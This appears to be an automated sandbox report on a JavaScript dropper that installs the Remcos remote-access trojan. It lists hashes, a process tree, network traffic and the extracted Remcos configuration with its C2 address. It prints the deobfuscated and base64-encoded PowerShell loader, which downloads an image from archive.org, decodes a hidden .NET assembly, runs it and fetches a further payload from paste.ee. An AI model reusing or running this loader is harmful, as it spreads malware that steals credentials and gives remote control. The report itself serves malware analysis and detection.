Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-09-2024 07:14

General

  • Target

    C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js

  • Size

    600KB

  • MD5

    2b1f137f22ac559ec305ce5cfa8890b4

  • SHA1

    78eea4d0412efdce79ecd7bd36381d9fcec3b07c

  • SHA256

    87a46f9efd26fa0b9182f12ee89ef19975fab1927d056629142608f27cc5f4b1

  • SHA512

    d772cf3cda1ac8368992d21217cd6c866a5554bc3f4e9ee728709c03d72e402f8bfcd5a21afc6e58dbcdba4090b0f9970b7adab857b1b6d85d123c24a616383c

  • SSDEEP

    12288:W8hhuwMaJTTfrjTsfY51YkMLrl5sDdNZftj0Ue6BzNv2kSw0OORbrHy3JTpgxRmX:BhJKIzFt4nR6jX5n

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$imageurl = "https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg"
2
$webclient = new-object system.net.webclient
3
$imagebytes = $webclient.downloaddata("https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg")
4
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
5
$startflag = "<<BASE64_START>>"
6
$endflag = "<<BASE64_END>>"
7
$startindex = $imagetext.indexof("<<BASE64_START>>")
8
$endindex = $imagetext.indexof("<<BASE64_END>>")
9
$startindex -ge 0 -and $endindex -gt $startindex
10
$startindex = $startflag.length
11
$base64length = $endindex - $startindex
12
$base64command = $imagetext.substring($startindex, $base64length)
13
$commandbytes = [system.convert]::frombase64string($base64command)
14
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
15
$type = $loadedassembly.gettype("dnlib.IO.Home")
16
$method = ($type.getmethod("VAI")).invoke($null, [object[]]"0/2XXnC/d/ee.etsap//:sptth", "1", "C:\\ProgramData\\", "enhadir", "AddInProcess32", "desativado")
17
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

remcos

Botnet

pc file

C2

185.150.191.117:4609

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PICFH2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AMgBYAFgAbgBDAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAnADEAJwAgACwAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcACcAIAAsACAAJwBlAG4AaABhAGQAaQByACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/2XXnC/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'enhadir','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3268
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\enhadir.js"
          4⤵
            PID:4640
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:652
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:340
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:916
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg"
                  5⤵
                    PID:4408
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2164
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\dgzxyypcdfejkhkhqqxqqgvpczf"
                    5⤵
                    • Accesses Microsoft Outlook accounts
                    • System Location Discovery: System Language Discovery
                    PID:2692
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\oaepzqaernwounylhbsstlqgkgomdk"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3908

          Network

          • flag-us
            DNS
            ia601606.us.archive.org
            powershell.exe
            Remote address:
            8.8.8.8:53
            Request
            ia601606.us.archive.org
            IN A
            Response
            ia601606.us.archive.org
            IN A
            207.241.227.86
          • flag-us
            GET
            https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
            powershell.exe
            Remote address:
            207.241.227.86:443
            Request
            GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
            Host: ia601606.us.archive.org
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Server: nginx/1.25.1
            Date: Mon, 16 Sep 2024 07:15:14 GMT
            Content-Type: image/jpeg
            Content-Length: 1931225
            Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
            Connection: keep-alive
            ETag: "66a41e98-1d77d9"
            Strict-Transport-Security: max-age=15724800
            Expires: Mon, 16 Sep 2024 13:15:14 GMT
            Cache-Control: max-age=21600
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
            Access-Control-Allow-Credentials: true
            Accept-Ranges: bytes
          • flag-us
            DNS
            86.227.241.207.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            86.227.241.207.in-addr.arpa
            IN PTR
            Response
            86.227.241.207.in-addr.arpa
            IN PTR
            ia601606usarchiveorg
          • flag-us
            DNS
            paste.ee
            powershell.exe
            Remote address:
            8.8.8.8:53
            Request
            paste.ee
            IN A
            Response
            paste.ee
            IN A
            104.21.84.67
            paste.ee
            IN A
            172.67.187.200
          • flag-us
            GET
            https://paste.ee/d/CnXX2/0
            powershell.exe
            Remote address:
            104.21.84.67:443
            Request
            GET /d/CnXX2/0 HTTP/1.1
            Host: paste.ee
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Date: Mon, 16 Sep 2024 07:15:17 GMT
            Content-Type: text/plain; charset=utf-8
            Transfer-Encoding: chunked
            Connection: keep-alive
            Cache-Control: max-age=2592000
            strict-transport-security: max-age=63072000
            x-frame-options: DENY
            x-content-type-options: nosniff
            x-xss-protection: 1; mode=block
            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOsU5iRZYjZ51B86VGVAk%2FqTPG3jXi1KSHGmH0bUVuWRb75%2BT1UmV9dN%2FWnmuQVBJvVJUs7MPqUNFmZnNJ7MCDLnHQpGhpw2s8kvzkzIDTSEuuJh%2FgR6z1XaxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8c3f107e1ab97767-LHR
            alt-svc: h3=":443"; ma=86400
          • flag-us
            DNS
            67.84.21.104.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            67.84.21.104.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            117.191.150.185.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            117.191.150.185.in-addr.arpa
            IN PTR
            Response
            117.191.150.185.in-addr.arpa
            IN PTR
            serverrsmithukcom
          • flag-us
            DNS
            geoplugin.net
            AddInProcess32.exe
            Remote address:
            8.8.8.8:53
            Request
            geoplugin.net
            IN A
            Response
            geoplugin.net
            IN A
            178.237.33.50
          • flag-nl
            GET
            http://geoplugin.net/json.gp
            AddInProcess32.exe
            Remote address:
            178.237.33.50:80
            Request
            GET /json.gp HTTP/1.1
            Host: geoplugin.net
            Cache-Control: no-cache
            Response
            HTTP/1.1 200 OK
            date: Mon, 16 Sep 2024 07:15:19 GMT
            server: Apache
            content-length: 954
            content-type: application/json; charset=utf-8
            cache-control: public, max-age=300
            access-control-allow-origin: *
          • flag-us
            DNS
            50.33.237.178.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            50.33.237.178.in-addr.arpa
            IN PTR
            Response
            50.33.237.178.in-addr.arpa
            IN CNAME
            50.32/27.178.237.178.in-addr.arpa
          • flag-us
            DNS
            22.236.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            22.236.111.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            209.80.50.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            209.80.50.20.in-addr.arpa
            IN PTR
            Response
          • 207.241.227.86:443
            https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
            tls, http
            powershell.exe
            59.0kB
            2.0MB
            1087
            1442

            HTTP Request

            GET https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

            HTTP Response

            200
          • 104.21.84.67:443
            https://paste.ee/d/CnXX2/0
            tls, http
            powershell.exe
            12.9kB
            688.8kB
            272
            536

            HTTP Request

            GET https://paste.ee/d/CnXX2/0

            HTTP Response

            200
          • 185.150.191.117:4609
            tls
            AddInProcess32.exe
            3.4kB
            1.7kB
            14
            17
          • 185.150.191.117:4609
            tls
            AddInProcess32.exe
            34.6kB
            512.4kB
            211
            384
          • 178.237.33.50:80
            http://geoplugin.net/json.gp
            http
            AddInProcess32.exe
            623 B
            1.3kB
            12
            3

            HTTP Request

            GET http://geoplugin.net/json.gp

            HTTP Response

            200
          • 8.8.8.8:53
            ia601606.us.archive.org
            dns
            powershell.exe
            69 B
            85 B
            1
            1

            DNS Request

            ia601606.us.archive.org

            DNS Response

            207.241.227.86

          • 8.8.8.8:53
            86.227.241.207.in-addr.arpa
            dns
            73 B
            110 B
            1
            1

            DNS Request

            86.227.241.207.in-addr.arpa

          • 8.8.8.8:53
            paste.ee
            dns
            powershell.exe
            54 B
            86 B
            1
            1

            DNS Request

            paste.ee

            DNS Response

            104.21.84.67
            172.67.187.200

          • 8.8.8.8:53
            67.84.21.104.in-addr.arpa
            dns
            71 B
            133 B
            1
            1

            DNS Request

            67.84.21.104.in-addr.arpa

          • 8.8.8.8:53
            117.191.150.185.in-addr.arpa
            dns
            74 B
            107 B
            1
            1

            DNS Request

            117.191.150.185.in-addr.arpa

          • 8.8.8.8:53
            geoplugin.net
            dns
            AddInProcess32.exe
            59 B
            75 B
            1
            1

            DNS Request

            geoplugin.net

            DNS Response

            178.237.33.50

          • 8.8.8.8:53
            50.33.237.178.in-addr.arpa
            dns
            72 B
            155 B
            1
            1

            DNS Request

            50.33.237.178.in-addr.arpa

          • 8.8.8.8:53
            22.236.111.52.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            22.236.111.52.in-addr.arpa

          • 8.8.8.8:53
            209.80.50.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            209.80.50.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            bdd6fe03cb914493642dbebd2a8eca3a

            SHA1

            5aedb1b99946f5cfca9a73733cb99f4c8fdd4d39

            SHA256

            c371097b809eb02248e6d38da3660037ce5690e428b4d6429bd8926c7c53a0d5

            SHA512

            2c3f0a05b4eed53f481d63528199396fe51f95a0a53183299de6e1d2544910b2a84b75d41f07b3ce082291cb710ba8b1ad422291e889cab4b32f8b3b73716781

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            560B

            MD5

            2adabd007b42e8ba4bcaeb41580de097

            SHA1

            e68c9d688921179dda32efad975c9d1478567526

            SHA256

            3696cd7703f6dc0bf4e89a22fb8b7f69f2bf758adbcfbc6b10dac6a8f3e08902

            SHA512

            11cb47f9bf19ac26dc321e00540b13a9989265f96e0408ed749cb7baf00ceb265ac72360526db3a285eb69a9f4e3b90890d93f14dfbcbf91f802a91986baa31d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilajjxte.h4u.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Local\Temp\belexfejhxmwhbovhfkpftbg

            Filesize

            4KB

            MD5

            00ab65283d294d9d0cc69dfd2b486caf

            SHA1

            804478c60330b8c19cc3a7cb2ceb906c0f32347c

            SHA256

            4bcd9431ddec18b317d0846b2aba64b064b54ea2639e64388ea00f6e559dbb34

            SHA512

            996ac8923c5b911b7716e4873590fd32a47bf0ccc53cd1476f6f276ba3b9777e490218bca05c16135c8ed70b9c0b86782273ab6748d80b7d67c0160abb3e922f

          • memory/916-71-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-68-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-86-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-54-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-58-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-59-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-60-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-101-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-100-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-96-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-66-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-67-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-69-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-89-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-94-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-90-0x0000000010000000-0x0000000010019000-memory.dmp

            Filesize

            100KB

          • memory/916-91-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-93-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/916-92-0x0000000000400000-0x0000000000482000-memory.dmp

            Filesize

            520KB

          • memory/2164-77-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2164-74-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2164-72-0x0000000000400000-0x0000000000478000-memory.dmp

            Filesize

            480KB

          • memory/2692-76-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/2692-75-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/2692-73-0x0000000000400000-0x0000000000462000-memory.dmp

            Filesize

            392KB

          • memory/3268-44-0x0000025440540000-0x0000025440662000-memory.dmp

            Filesize

            1.1MB

          • memory/3748-65-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3748-5-0x00000223801E0000-0x0000022380202000-memory.dmp

            Filesize

            136KB

          • memory/3748-0-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

            Filesize

            4KB

          • memory/3748-9-0x00000223805F0000-0x0000022380666000-memory.dmp

            Filesize

            472KB

          • memory/3748-8-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3748-10-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

            Filesize

            9.9MB

          • memory/3908-78-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB

          • memory/3908-79-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB

          • memory/3908-80-0x0000000000400000-0x0000000000424000-memory.dmp

            Filesize

            144KB

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.